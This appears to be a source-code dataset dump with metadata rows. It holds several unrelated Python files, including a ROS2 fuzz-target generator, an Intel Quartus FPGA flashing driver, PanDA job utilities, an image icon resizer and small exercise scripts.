if unit not in _UNIT_TO_JUNIT:
raise ValueError("unit must be in {}".format(_UNIT_TO_JUNIT.keys()))
return scala_package_object(jvm(sc).scala.concurrent.duration).__getattr__(_UNIT_TO_JUNIT[unit])()
def jschema(sc, schema):
"""Converts a Python schema (StructType) to a Scala schema ``org.apache.spark.sql.types.StructType``
:return: :class:``org.apache.spark.sql.types.StructType``
"""
import json
return jvm(sc).org.apache.spark.sql.types.StructType.fromString(json.dumps(schema.jsonValue))
| 30.754098 | 104 | 0.67564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,250 | 0.59968 |
2bd798abddd7a95bff54e0bc290234fe6c7881d3 | 821 | py | Python | ros2_automatic_fuzzer/ros2_fuzzer/service_fuzzer.py | rosin-project/ros2_fuzz | a01394f530ada966a5f9f72fd3990a6964fb8bff | [
"MIT"
] | 8 | 2020-11-13T11:56:52.000Z | 2021-08-31T09:37:57.000Z | ros2_automatic_fuzzer/ros2_fuzzer/service_fuzzer.py | JnxF/automatic_fuzzing | e49135335e9d65cee4bf82c6d18a09beb9238000 | [
"MIT"
] | 2 | 2021-06-10T09:50:45.000Z | 2021-09-13T14:39:32.000Z | ros2_automatic_fuzzer/ros2_fuzzer/service_fuzzer.py | JnxF/automatic_fuzzing | e49135335e9d65cee4bf82c6d18a09beb9238000 | [
"MIT"
] | null | null | null | import sys
import os
sys.path.append("..")
from ros2_fuzzer.fuzzing_utils.type_parser import TypeParser
from ros2_fuzzer.fuzzing_utils.fuzzing_descriptor import FuzzTargetProcessor
from ros2_fuzzer.fuzzing_utils.generate_cpp_file import generate_cpp_file
def generate_service_template(source: str, ros_type_str: str, headers_file: str) -> str:
original_file = os.path.basename(source)
topic_name = ros_type_str.replace("::", "/")
ros_type = TypeParser.parse_type(topic_name)
fuzz_target = FuzzTargetProcessor().process(
ros_type,
headers_file=headers_file,
original_file=original_file,
ros_type_str=ros_type_str,
)
return generate_cpp_file(
fuzz_target=fuzz_target,
source_file=source,
template_name="service_template.jinx.cpp",
)
| 29.321429 | 88 | 0.744214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 38 | 0.046285 |
2bd84f2755773c44a8ad81ee8940c817d7f00023 | 1,432 | py | Python | scripts/iconify.py | hallc/labs | 90c154fe7ea249641b5a05ae648e13f45ab3eb0e | [
"MIT"
] | null | null | null | scripts/iconify.py | hallc/labs | 90c154fe7ea249641b5a05ae648e13f45ab3eb0e | [
"MIT"
] | null | null | null | scripts/iconify.py | hallc/labs | 90c154fe7ea249641b5a05ae648e13f45ab3eb0e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import argparse
import os
from PIL import Image
densities = {
'mdpi': 48,
'hdpi': 72,
'xhdpi': 96,
'xxhdpi': 144,
'xxxhdpi': 192
}
class PathAction(argparse.Action):
def __call__(self, parser, namespace, value, options_string=None):
if not os.path.exists(value):
raise argparse.ArgumentError(self, 'Path does not exist: {}'.format(value))
if not os.path.isdir(value):
raise argparse.ArgumentError(self, 'Path is not a directory: {}'.format(value))
if value.endswith('/'):
value = value[:-1]
setattr(namespace, self.dest, value)
def main():
args = _parse_args()
source = Image.open(args.source)
for density_name in densities:
density_size = densities[density_name]
destination = _create_output_file(args.res_dir, density_name, args.filename)
print('Writing: {}'.format(destination))
icon = source.resize((density_size, density_size), Image.LANCZOS)
icon.save(destination, 'PNG')
icon.close()
print('...done!')
def _parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('source', type=argparse.FileType('r'))
parser.add_argument('filename')
parser.add_argument('res_dir', action=PathAction)
return parser.parse_args()
def _create_output_file(res_dir, density, filename):
path = '{}/mipmap-{}'.format(res_dir, density)
if not os.path.exists(path):
os.makedirs(path)
return '{}/{}'.format(path, filename)
if __name__ == '__main__':
main()
| 26.036364 | 82 | 0.713687 | 414 | 0.289106 | 0 | 0 | 0 | 0 | 0 | 0 | 203 | 0.14176 |
2bd852a26654310e3a3bb617e66a4db19ed7396d | 3,814 | py | Python | pandaserver/taskbuffer/JobUtils.py | virthead/panda-server | d2b65f788c4539dc103641ca2a8052cb18729d44 | [
"Apache-2.0"
] | 7 | 2015-03-30T14:15:35.000Z | 2021-12-22T06:48:22.000Z | pandaserver/taskbuffer/JobUtils.py | virthead/panda-server | d2b65f788c4539dc103641ca2a8052cb18729d44 | [
"Apache-2.0"
] | 16 | 2015-06-01T13:48:01.000Z | 2022-02-08T15:03:32.000Z | pandaserver/taskbuffer/JobUtils.py | virthead/panda-server | d2b65f788c4539dc103641ca2a8052cb18729d44 | [
"Apache-2.0"
] | 15 | 2015-03-02T08:57:35.000Z | 2022-03-01T09:48:45.000Z | import re
try:
long
except NameError:
long = int
# list of prod source label for pilot tests
list_ptest_prod_sources = ['ptest', 'rc_test', 'rc_test2', 'rc_alrb']
# mapping with prodsourcelabels that belong to analysis and production
analy_sources = ['user', 'panda']
prod_sources = ['managed', 'prod_test']
neutral_sources = ['install'] + list_ptest_prod_sources
ANALY_PS = 'user'
PROD_PS = 'managed'
ANALY_TASKTYPE = 'anal'
PROD_TASKTYPE = 'prod'
job_labels = [ANALY_PS, PROD_PS]
# priority of tasks to jumbo over others
priorityTasksToJumpOver = 1500
def translate_resourcetype_to_cores(resource_type, cores_queue):
# resolve the multiplying core factor
if 'MCORE' in resource_type:
return cores_queue
else:
return 1
def translate_prodsourcelabel_to_jobtype(queue_type, prodsourcelabel):
if prodsourcelabel in analy_sources:
return ANALY_PS
if prodsourcelabel in prod_sources:
return PROD_PS
if prodsourcelabel in neutral_sources:
if queue_type == 'unified' or queue_type == 'production':
return PROD_PS
if queue_type == 'analysis':
return ANALY_PS
# currently unmapped
return prodsourcelabel
def translate_tasktype_to_jobtype(task_type):
# any unrecognized tasktype will be defaulted to production
if task_type == ANALY_TASKTYPE:
return ANALY_PS
else:
return PROD_PS
# get core count
def getCoreCount(actualCoreCount, defCoreCount, jobMetrics):
coreCount = 1
try:
if actualCoreCount is not None:
coreCount = actualCoreCount
else:
tmpMatch = None
if jobMetrics is not None:
# extract coreCount
tmpMatch = re.search('coreCount=(\d+)',jobMetrics)
if tmpMatch is not None:
coreCount = long(tmpMatch.group(1))
else:
# use jobdef
if defCoreCount not in [None, 0]:
coreCount = defCoreCount
except Exception:
pass
return coreCount
# get HS06sec
def getHS06sec(startTime, endTime, corePower, coreCount, baseWalltime=0, cpuEfficiency=100):
try:
# no scaling
if cpuEfficiency == 0:
return 0
# get execution time
tmpTimeDelta = endTime-startTime
tmpVal = tmpTimeDelta.seconds + tmpTimeDelta.days * 24 * 3600
if tmpVal <= baseWalltime:
return 0
hs06sec = float(tmpVal-baseWalltime) * corePower * coreCount * float(cpuEfficiency) / 100.0
return hs06sec
except Exception:
return None
# parse string for number of standby jobs
def parseNumStandby(catchall):
retMap = {}
if catchall is not None:
for tmpItem in catchall.split(','):
tmpMatch = re.search('^nStandby=(.+)', tmpItem)
if tmpMatch is None:
continue
for tmpSubStr in tmpMatch.group(1).split('|'):
if len(tmpSubStr.split(':')) != 3:
continue
sw_id, resource_type, num = tmpSubStr.split(':')
try:
sw_id = int(sw_id)
except Exception:
pass
if sw_id not in retMap:
retMap[sw_id] = {}
if num == '':
num = 0
else:
num = int(num)
retMap[sw_id][resource_type] = num
break
return retMap
# compensate memory count to prevent jobs with ramCount close to the HIMEM border from going to HIMEM PQs
def compensate_ram_count(ram_count):
if ram_count == 'NULL':
ram_count = None
if ram_count is not None:
ram_count = int(ram_count * 0.90)
return ram_count
| 28.462687 | 105 | 0.607499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.184059 |
2bdae61f57803109d14c71c62a57ac97f4c10c5b | 724 | py | Python | v002/__init__.py | cgarcia-UCO/AgentSurvival | 34c4b265c90f0b74fec8dbc65c275eb5cdd16ba3 | [
"MIT"
] | null | null | null | v002/__init__.py | cgarcia-UCO/AgentSurvival | 34c4b265c90f0b74fec8dbc65c275eb5cdd16ba3 | [
"MIT"
] | null | null | null | v002/__init__.py | cgarcia-UCO/AgentSurvival | 34c4b265c90f0b74fec8dbc65c275eb5cdd16ba3 | [
"MIT"
] | null | null | null | try:
from IPython import get_ipython
if get_ipython().__class__.__name__ not in ['NoneType']:
from IPython import display
i_am_in_interatcive = True
import pylab as pl
pl.rcParams['figure.figsize'] = [13, 13]
# print("INTERACTIVE")
else:
import matplotlib.pyplot as pl
i_am_in_interatcive = False
# print("NOT INTERACTIVE")
except:
import matplotlib.pyplot as pl
i_am_in_interatcive = False
# print("__INIT__ EXECUTED")
from .Agent import Agent
from .Enviroment_with_agents import Enviroment_with_agents
from .Enviroment import Enviroment
from .InOut_Simple_Laberinth import InOut_Simple_Laberinth, No_Walls_Laberinth
import numpy as np
| 28.96 | 78 | 0.718232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 102 | 0.140884 |
2bdb72de3864824147a567ff656f6b865054a2e0 | 1,543 | py | Python | lib/constants.py | PEDIA-Charite/PEDIA-workflow | f0ab0c7ed3833edb01ad0772ad294978b71feb64 | [
"MIT"
] | 9 | 2017-10-16T17:04:48.000Z | 2021-11-03T13:09:11.000Z | lib/constants.py | PEDIA-Charite/PEDIA-workflow | f0ab0c7ed3833edb01ad0772ad294978b71feb64 | [
"MIT"
] | 60 | 2017-05-22T15:43:06.000Z | 2022-02-07T22:16:48.000Z | lib/constants.py | PEDIA-Charite/PEDIA-workflow | f0ab0c7ed3833edb01ad0772ad294978b71feb64 | [
"MIT"
] | 9 | 2017-11-27T16:19:11.000Z | 2021-01-24T03:48:08.000Z | '''
Constants
---
Constants used in other scripts. These are mostly interpretations of fields
provided in the Face2Gene jsons.
'''
HGVS_ERRORDICT_VERSION = 0
# Bucket name, from where Face2Gene vcf and json files will be downloaded
AWS_BUCKET_NAME = "fdna-pedia-dump"
# caching directory
CACHE_DIR = ".cache"
# tests that count as chromosomal tests, if these are positive, cases will be
# excluded
CHROMOSOMAL_TESTS = [
'CHROMOSOMAL_MICROARRAY',
'FISH',
'KARYOTYPE'
]
# Test result descriptions, that will be counted as positive for our case
# selection criteria
POSITIVE_RESULTS = [
'ABNORMAL',
'ABNORMAL_DIAGNOSTIC',
'DELETION_DUPLICATION',
'VARIANTS_DETECTED'
]
NEGATIVE_RESULTS = [
'NORMAL'
'NORMAL_FEMALE'
'NORMAL_MALE'
'NO_SIGNIFICANT_VARIANTS'
]
# Translation of Face2Gene Mutation notation to HGVS operators
HGVS_OPS = {
'SUBSTITUTION': '>',
'DELETION': 'del',
'DUPLICATION': 'dup',
'INSERTION': 'ins',
'INVERSION': 'inv',
'DELETION_INSERTION': 'delins',
'UNKNOWN': ''
}
# Translation of Description levels in Face2Gene to HGVS sequence types
HGVS_PREFIX = {
'CDNA_LEVEL': 'c',
'PROTEIN_LEVEL': 'p',
'GENOMIC_DNA_LEVEL': 'g',
'UNKNOWN': '',
'RS_NUMBER': ''
}
# blacklist HPO illegal hpo terms
ILLEGAL_HPO = [
'HP:0000006' # autosomal-dominant inheritance
]
CONFIRMED_DIAGNOSIS = [
"MOLECULARLY_DIAGNOSED",
"CLINICALLY_DIAGNOSED",
"CORRECTED_DIAGNOSIS"
]
DIFFERENTIAL_DIAGNOSIS = [
"DIFFERENTIAL_DIAGNOSIS",
]
| 20.302632 | 77 | 0.69151 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,101 | 0.713545 |
2bdb8dac398701774f4f849fe5868b3aef79e3a7 | 806 | py | Python | jetson_nano/serial_monitor.py | hixio-mh/BatBot | b83bd2a9348baf708a8d009a4872d27f40177b61 | [
"MIT"
] | 32 | 2019-12-02T08:26:31.000Z | 2022-01-13T06:56:19.000Z | jetson_nano/serial_monitor.py | resslerruntime/BatBot | b83bd2a9348baf708a8d009a4872d27f40177b61 | [
"MIT"
] | 15 | 2020-01-28T22:17:38.000Z | 2022-03-12T00:02:01.000Z | jetson_nano/serial_monitor.py | resslerruntime/BatBot | b83bd2a9348baf708a8d009a4872d27f40177b61 | [
"MIT"
] | 17 | 2019-11-26T14:46:05.000Z | 2021-07-05T12:46:58.000Z | #!/usr/bin/python3
import serial # http://pyserial.sf.net
import time
from datetime import datetime
import struct
port = '/dev/ttyACM0' # note I'm using Jetson Nano
arduino = serial.Serial(port, 9600, timeout=5)
time.sleep(2) # wait for Arduino
arduino.flush()
command = 'X' # SET TIME
encoded_command = command.encode();
arduino.write(encoded_command)
arduino.flush()
time.sleep(1)
now = datetime.now()
timestamp = int(datetime.timestamp(now))
commdata = arduino.write(struct.pack('>L', timestamp))
arduino.flush()
time.sleep(1)
print("SET_TIME offset sent: ")
print(str(timestamp))
while True:
time.sleep(1) # wait for Arduino
arduino.flush()
msg = arduino.read(arduino.inWaiting()) # read all characters in buffer
text = msg.decode().strip()
if text != '':
print(text)
| 23.028571 | 75 | 0.705955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 194 | 0.240695 |
2bdb91041eec35c1c58197d76e4a723d39aceee0 | 18,798 | py | Python | ttbd/ttbl/quartus.py | inakypg/tcf | 569e21b25c8ee72ebad0c80d0a7de0714411185f | [
"Apache-2.0"
] | 1 | 2018-08-31T06:48:14.000Z | 2018-08-31T06:48:14.000Z | ttbd/ttbl/quartus.py | inakypg/tcf | 569e21b25c8ee72ebad0c80d0a7de0714411185f | [
"Apache-2.0"
] | null | null | null | ttbd/ttbl/quartus.py | inakypg/tcf | 569e21b25c8ee72ebad0c80d0a7de0714411185f | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/python3
#
# Copyright (c) 2021 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
import copy
import os
import subprocess
import commonl
import ttbl
import ttbl.images
import ttbl.power
class pgm_c(ttbl.images.flash_shell_cmd_c):
"""Flash using Intel's Quartus PGM tool
This allows to flash images to an Altera MAX10, using the Quartus
tools, freely downloadable from
https://www.intel.com/content/www/us/en/collections/products/fpga/software/downloads.html?s=Newest
Exports the following interfaces:
- power control (using any AC power switch, such as the
:class:`Digital Web Power Switch 7 <ttbl.pc.dlwps7>`)
- serial console
- image (in hex format) flashing (using the Quartus Prime tools
package)
Multiple instances at the same time are supported; however, due to
the JTAG interface not exporting a serial number, addressing has
to be done by USB path, which is risky (as it will change when the
cable is plugged to another port or might be enumerated in a
different number).
:param str usb_serial_number: USB serial number of the USB device to use
(USB-BlasterII or similar)
:param dict image_map:
:param str name: (optiona; default 'Intel Quartus PGM #<DEVICEID>')
instrument's name.
:param dict args: (optional) dictionary of extra command line options to
*quartus_pgm*; these are expanded with the target keywords with
*%(FIELD)s* templates, with fields being the target's
:ref:`metadata <finding_testcase_metadata>`:
FIXME: move to common flash_shell_cmd_c
:param dict jtagconfig: (optional) jtagconfig --setparam commands
to run before starting.
These are expanded with the target keywords with
*%(FIELD)s* templates, with fields being the target's
:ref:`metadata <finding_testcase_metadata>` and then run as::
jtagconfig --setparam CABLENAME KEY VALUE
:param int tcp_port: (optional, default *None*) if a TCP port
number is given, it is a assumed the flashing server is in
localhost in the given TCP port.
:param str sibling_serial_number (optional, default *None*) USB serial
number of the USB device that is a sibling to the one defined by
usb_serial_number
:param int usb_port (optional, default *None*) port that the USB device is
connected to, used in combination with sibling_serial_number to find
the USB path for devices that do not have unique serial numbers (USB
Blaster I)
Other parameters described in :class:ttbl.images.impl_c.
**Command line reference**
https://www.intel.com/content/dam/www/programmable/us/en/pdfs/literature/manual/tclscriptrefmnl.pdf
Section Quartus_PGM (2-50)
**System setup**
- Download and install Quartus Programmer::
$ wget http://download.altera.com/akdlm/software/acdsinst/20.1std/711/ib_installers/QuartusProgrammerSetup-20.1.0.711-linux.run
# chmod a+x QuartusProgrammerSetup-20.1.0.711-linux.run
# ./QuartusProgrammerSetup-20.1.0.711-linux.run --unattendedmodeui none --mode unattended --installdir /opt/quartus --accept_eula 1
- if installing to a different location than */opt/quartus*,
adjust the value of :data:`path` in a FIXME:ttbd configuration
file.
**Troubleshooting**
When it fails to flash, the error log is reported in the server in
a file called *flash-COMPONENTS.log* in the target's state
directory (FIXME: we need a better way for this--the admin shall
be able to read it, but not the users as it might leak sensitive
information?).
Common error messages:
- *Error (213019): Can't scan JTAG chain. Error code 87*
Also seen when manually running in the server::
$ /opt/quartus/qprogrammer/bin/jtagconfig
1) USB-BlasterII [3-1.4.4.3]
Unable to read device chain - JTAG chain broken
In many cases this has been:
- a powered off main board: power it on
- a misconnected USB-BlasterII: reconnect properly
- a broken USB-BlasterII: replace unit
- *Error (209012): Operation failed*
this usually happens when flashing one component of a multiple
component chain; the log might read something like::
Info (209060): Started Programmer operation at Mon Jul 20 12:05:22 2020
Info (209017): Device 2 contains JTAG ID code 0x038301DD
Info (209060): Started Programmer operation at Mon Jul 20 12:05:22 2020
Info (209016): Configuring device index 2
Info (209017): Device 2 contains JTAG ID code 0x018303DD
Info (209007): Configuration succeeded -- 1 device(s) configured
Info (209011): Successfully performed operation(s)
Info (209061): Ended Programmer operation at Mon Jul 20 12:05:22 2020
Error (209012): Operation failed
Info (209061): Ended Programmer operation at Mon Jul 20 12:05:22 2020
Error: Quartus Prime Programmer was unsuccessful. 1 error, 0 warnings
This case has been found to be because the **--bgp** option is
needed (which seems to map to the *Enable Realtime ISP
programming* in the Quartus UI, *quartus_pgmw*)
- *Warning (16328): The real-time ISP option for Max 10 is
selected. Ensure all Max 10 devices being programmed are in user
mode when requesting this programming option*
Followed by:
*Error (209012): Operation failed*
This case comes when a previous flashing process was interrupted
half way or the target is corrupted.
It needs a special one-time recovery; currently the
workaround seems to run the flashing with out the *--bgp* switch
that as of now is hardcoded.
FIXME: move the --bgp and --mode=JTAG switches to the args (vs
hardcoded) so a recovery target can be implemented as
NAME-nobgp
*Using Quartus tool with a remote jtagd*
The service port for *jtagd* can be tunneled in and used by the
Quartus toolsuite::
$ tcf property-get r013s001 interfaces.power.jtagd.tcp_port
5337
$ tcf power-on -c jtagd TARGET
$ tcf tunnel-add TARGET 5337 tcp 127.0.01
SERVERNAME:1234
Now the Quartus Qprogrammer tools need to be told which server to
add::
$ jtagdconfig --addserver SERVERNAME:1234 ""
(second entry is an empty password); this adds an entry to
*~/.jtagd.conf*::
# /home/USERNAME/.jtag.conf
Remote1 {
Host = "SERVERNAME:1234";
Password = "";
}
Note the port number changes with each tunnel, you will have to
*jtagconfig --addserver* and delete the old one (you can edit the
file by hand too).
Now list remote targets::
$ jtagconfig
1) USB-BlasterII on SERVERNAME:1234 [3-1.4.1]
031050DD 10M50DA(.|ES)/10M50DC
031040DD 10M25D(A|C)
Note this connection is open to anyone until the tunnel is removed
or the allocation is released with *tcf alloc-rm* or
equivalent. *PENDING* use SSL to secure access.
[ see also for the Quartus GUI, follow
https://www.intel.com/content/www/us/en/programmable/quartushelp/13.0/mergedProjects/program/pgm/pgm_pro_add_server.htm ]
**Quartus Lite**
Download from https://www.intel.com/content/www/us/en/software-kit/684215/intel-quartus-prime-lite-edition-design-software-version-21-1-for-linux.html?
Install with::
$ tar xf Quartus-lite-21.1.0.842-linux.tar
$ cd components
$ chmod a+x ./Quartus-lite-21.1.0.842-linux.tar
$ ./Quartus-lite-21.1.0.842-linux.tar
Quartus will use the same *~/.jtagd.conf* if you have used
*jtagconfig* to configure as above
1. Start Quartus::
$ INSTALLPATH/intelFPGA_lite/21.1/quartus/bin/quartus
2. Go to Programmer > Edit > Hardware Setup
3. Click on *Add Hardware*
4. Enter as *Server Name* and *Server Port* the name of the server
that is doing the tunnel (as printed by *tcf tunnel-add*
above); leave the password blank.
5. Click *OK*
**Troubleshooting**
- can't connect to port::
$ ./jtagconfig
1) Remote server SERVERNAME:1234: Unable to connect
- ensure jtagd in the target is on
- ensure the tunnel is on
"""
#: Path to *quartus_pgm*
#:
#: We need to use an ABSOLUTE PATH if the tool is not in the
#: normal search path (which usually won't).
#:
#: Change by setting, in a :ref:`server configuration file
#: <ttbd_configuration>`:
#:
#: >>> ttbl.quartus.pgm_c.path = "/opt/quartus/qprogrammer/bin/quartus_pgm"
#:
#: or for a single instance that then will be added to config:
#:
#: >>> imager = ttbl.quartus.pgm_c(...)
#: >>> imager.path = "/opt/quartus/qprogrammer/bin/quartus_pgm"
path = "/opt/quartus/qprogrammer/bin/quartus_pgm"
path_jtagconfig = "/opt/quartus/qprogrammer/bin/jtagconfig"
def __init__(self, usb_serial_number, image_map, args = None, name = None,
jtagconfig = None, tcp_port = None,
sibling_serial_number = None, usb_port = None,
**kwargs):
assert isinstance(usb_serial_number, str)
commonl.assert_dict_of_ints(image_map, "image_map")
commonl.assert_none_or_dict_of_strings(jtagconfig, "jtagconfig")
assert name == None or isinstance(name, str)
assert tcp_port == None or isinstance(tcp_port, int)
self.usb_serial_number = usb_serial_number
self.tcp_port = tcp_port
self.image_map = image_map
self.jtagconfig = jtagconfig
self.sibling_serial_number = sibling_serial_number
self.usb_port = usb_port
if args:
commonl.assert_dict_of_strings(args, "args")
self.args = args
else:
self.args = {}
cmdline = [
"stdbuf", "-o0", "-e0", "-i0",
self.path,
# FIXME: move this to args, enable value-less args (None)
"--bgp", # Real time background programming
"--mode=JTAG", # this is a JTAG
# when using a server, if the target is called
# SOMETHING in SERVERNAME:PORT CABLENAME, it seems PGM
# goes straight there. Weird
"-c", "%(device_path)s", # will resolve in flash_start()
# in flash_start() call we'll map the image names to targets
# to add these
#
#'--operation=PVB;%(image.NAME)s@1',
#'--operation=PVB;%(image.NAME)s@2',
#...
# (P)rogram (V)erify, (B)lank-check
#
# note like this we can support burning multiple images into the
# same chain with a single call
]
if args:
for arg, value in args.items():
if value != None:
cmdline += [ arg, value ]
# we do this because in flash_start() we need to add
# --operation as we find images we are supposed to flash
self.cmdline_orig = cmdline
ttbl.images.flash_shell_cmd_c.__init__(self, cmdline, cwd = '%(file_path)s',
**kwargs)
if name == None:
self.name = "quartus"
self.upid_set(
f"Intel Quartus PGM @ USB#{usb_serial_number}",
usb_serial_number = usb_serial_number)
def flash_start(self, target, images, context):
# Finalize preparing the command line for flashing the images
# find the device path; quartus_pgm doesn't seem to be able to
# address by serial and expects a cable name as 'PRODUCT NAME
# [PATH]', like 'USB BlasterII [1-3.3]'; we can't do this on
# object creation because the USB path might change when we power
# it on/off (rare, but could happen). Since USB Blaster I do not
# have unique serial numbers we use a combination of usb_port
# and sibling_serial_number to find the correct usb_path
if self.usb_port != None:
usb_path, _vendor, product = ttbl.usb_serial_to_path(
self.sibling_serial_number, self.usb_port)
else:
usb_path, _vendor, product = ttbl.usb_serial_to_path(
self.usb_serial_number)
if self.tcp_port:
# server based cable name
device_path = f"{product} on localhost:{self.tcp_port} [{usb_path}]"
jtag_config_filename = f"{target.state_dir}/jtag-{'_'.join(images.keys())}.conf"
# Create the jtag client config file to ensure that
# the correct jtag daemon is connected to, then use the
# environment variable QUARTUS_JTAG_CLIENT_CONFIG to have
# the quartus software find it
with open(jtag_config_filename, "w+") as jtag_config:
jtag_config.write(
f'ReplaceLocalJtagServer = "localhost:{self.tcp_port}";')
self.env_add["QUARTUS_JTAG_CLIENT_CONFIG"] = jtag_config_filename
else:
# local cable name, starts sever on its own
device_path = f"{product} [{usb_path}]"
context['kws'] = {
# HACK: we assume all images are in the same directory, so
# we are going to cwd there (see in __init__ how we set
# cwd to %(file_path)s. Reason is some of our paths might
# include @, which the tool considers illegal as it uses
# it to separate arguments--see below --operation
'file_path': os.path.dirname(list(images.values())[0]),
'device_path': device_path,
# flash_shell_cmd_c.flash_start() will add others
}
# for each image we are burning, map it to a target name in
# the cable (@NUMBER)
# make sure we don't modify the originals
cmdline = copy.deepcopy(self.cmdline_orig)
for image_type, filename in images.items():
target_index = self.image_map.get(image_type, None)
# pass only the realtive filename, as we are going to
# change working dir into the path (see above in
# context[kws][file_path]
cmdline.append("--operation=PVB;%s@%d" % (
os.path.basename(filename), target_index))
# now set it for flash_shell_cmd_c.flash_start()
self.cmdline = cmdline
if self.jtagconfig:
for option, value in self.jtagconfig.items():
cmdline = [
self.path_jtagconfig,
"--addserver", f"localhost:{self.tcp_port}", "", # empty password
"--setparam",
device_path,
option, value
]
target.log.info("running per-config: %s" % " ".join(cmdline))
subprocess.check_output(
cmdline, shell = False, stderr = subprocess.STDOUT)
ttbl.images.flash_shell_cmd_c.flash_start(self, target, images, context)
class jtagd_c(ttbl.power.daemon_c):
"""Driver for the jtag daemon
This driver starts the jtag daemon on the server for a specific
USB Blaster II
Does not override any of the default methods except for verify
**Arugments**
:param str usb_serial_number: serial number of the USB Blaster II
:param int tcp_port: (1024 - 65536) Number of the TCP port on
localhost where the daemon will listen
:param str jtagd_path: (optional) orverride :data:`jtagd_path`;
:param str explicit: (optional; default *off*) control when this
is started on/off:
- *None*: for normal behaviour; component will be
powered-on/started with the whole power rail
- *both*: explicit for both powering on and off: only
power-on/start and power-off/stop if explicity called by
name
- *on*: explicit for powering on: only power-on/start if explicity
powered on by name, power off normally
- *off*: explicit for powering off: only power-off/stop if explicity
powered off by name, power on normally
By default it is set to *off*, so that when the target is powere
off existing network connections to the daemon are maintained.
Any other arguments as taken by :class:ttbl.power.daemon_c and
:class:ttbl.power.impl_c.
"""
jtagd_path = "/opt/quartus/qprogrammer/bin/jtagd"
def __init__(self, usb_serial_number, tcp_port, jtagd_path = None,
check_path = None, explicit = "off", **kwargs):
assert isinstance(usb_serial_number, str), \
"usb_serial_number: expected a string, got %s" % type(usb_serial_number)
assert isinstance(tcp_port, int), \
"tcp_port: expected an integer between 1024 and 65536, got %s" \
% type(usb_serial_number)
if jtagd_path:
self.jtagd_path = jtagd_path
assert isinstance(self.jtagd_path, str), \
"openipc_path: expected a string, got %s" % type(jtagd_path)
self.usb_serial_number = usb_serial_number
self.tcp_port = tcp_port
cmdline = [
self.jtagd_path,
"--no-config",
"--auto-detect-filter", usb_serial_number,
"--port", str(tcp_port),
"--debug",
"--foreground",
]
ttbl.power.daemon_c.__init__(
self, cmdline, precheck_wait = 0.5, mkpidfile = True,
name = "jtagd", explicit = explicit,
# ...linux64/jtagd renames itself to jtagd and it makes it hard to kill
path = "jtagd",
check_path = "/opt/quartus/qprogrammer/linux64/jtagd",
**kwargs)
# Register the instrument like this, so it matches pgm_c and
# others and they all point to the same instrument
self.upid_set(
f"Intel Quartus PGM @ USB#{usb_serial_number}",
usb_serial_number = usb_serial_number)
def target_setup(self, target, iface_name, component):
target.fsdb.set(f"interfaces.{iface_name}.{component}.tcp_port",
self.tcp_port)
#Set the local ports that is able to be reached via tunneling
target.tunnel.allowed_local_ports.add(("127.0.0.1", "tcp",
self.tcp_port))
ttbl.power.daemon_c.target_setup(self, target, iface_name, component)
def verify(self, target, component, cmdline_expanded):
pidfile = os.path.join(target.state_dir, component + "-jtagd.pid")
return commonl.process_alive(pidfile, self.check_path) \
and commonl.tcp_port_busy(self.tcp_port)
def on(self, target, component):
return ttbl.power.daemon_c.on(self, target, component)
| 37.899194 | 155 | 0.641132 | 18,584 | 0.988616 | 0 | 0 | 0 | 0 | 0 | 0 | 13,224 | 0.703479 |
2bdc74e67c215c83e64d2416221be3804da9d5cb | 883 | py | Python | files/carinha.py | joaovpassos/USP-Programs | 09ddb8aed238df1f1a2e80afdc202ac4538daf41 | [
"MIT"
] | 2 | 2021-05-26T19:14:16.000Z | 2021-05-27T21:14:24.000Z | files/carinha.py | joaovpassos/USP-Programs | 09ddb8aed238df1f1a2e80afdc202ac4538daf41 | [
"MIT"
] | null | null | null | files/carinha.py | joaovpassos/USP-Programs | 09ddb8aed238df1f1a2e80afdc202ac4538daf41 | [
"MIT"
] | null | null | null | x = float(input("Digite x: "))
y = float(input("Digite y: "))
if 0 <= x <= 8 and 0 <= y <= 8:
if (0 <= x < 1 or 7 < x <= 8) and (0 <= y < 2): #pescoço
print("branco")
elif 3.5 <= x <= 4.5 and 3.5 <= y <= 4.5: #nariz
print("branco")
elif (1 <= x <= 3 or 5 <= x <= 7) and (7.25 <= y <= 7.75): #sobrancelha
print("branco")
elif (((x-2)**2 + (y-6)**2 <= 1**2) and not ((x-2)**2 + (y-6)**2 <= 0.5**2)): #olho esquerdo
print("branco")
elif (((x-6)**2 + (y-6)**2 <= 1**2) and not ((x-6)**2 + (y-6)**2 <= 0.5**2)): #olho direito
print("branco")
elif 3 < x < 5 and 1.5 < y < 2.5: #boca
print("branco")
elif ((x-3)**2 + (y-2)**2 < 0.5**2): #boca esquerda
print("branco")
elif ((x-5)**2 + (y-2)**2 < 0.5**2): #boca direita
print("branco")
else:
print("azul")
else:
print("branco")
| 35.32 | 96 | 0.437146 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 188 | 0.21267 |
2bdcbb9196f7ddd57e7b4ad584ef8f3fd81fbbd6 | 565 | py | Python | delivery/delivery/exts/cli/__init__.py | all0cer/flask | a72bee18fd8d4ccf0f16e0e637f7e0b1779e7d85 | [
"Unlicense"
] | null | null | null | delivery/delivery/exts/cli/__init__.py | all0cer/flask | a72bee18fd8d4ccf0f16e0e637f7e0b1779e7d85 | [
"Unlicense"
] | null | null | null | delivery/delivery/exts/cli/__init__.py | all0cer/flask | a72bee18fd8d4ccf0f16e0e637f7e0b1779e7d85 | [
"Unlicense"
] | null | null | null | from enum import Flag
import click
from delivery.exts.db import db
from delivery.exts.db import models
def init_app(app):
@app.cli.command()
def create_db():
db.create_all()
@app.cli.command()
@click.option("--email", "-e")
@click.option("--passwd", "-p")
@click.option("--admin", "-a", is_flag=True, default=False)
def add_new_user(email, passwd, admin):
user = User(
email = email,
passwd = passwd,
admin = admin
)
db.session.add(user)
db.session.commit() | 23.541667 | 63 | 0.576991 | 0 | 0 | 0 | 0 | 430 | 0.761062 | 0 | 0 | 40 | 0.070796 |
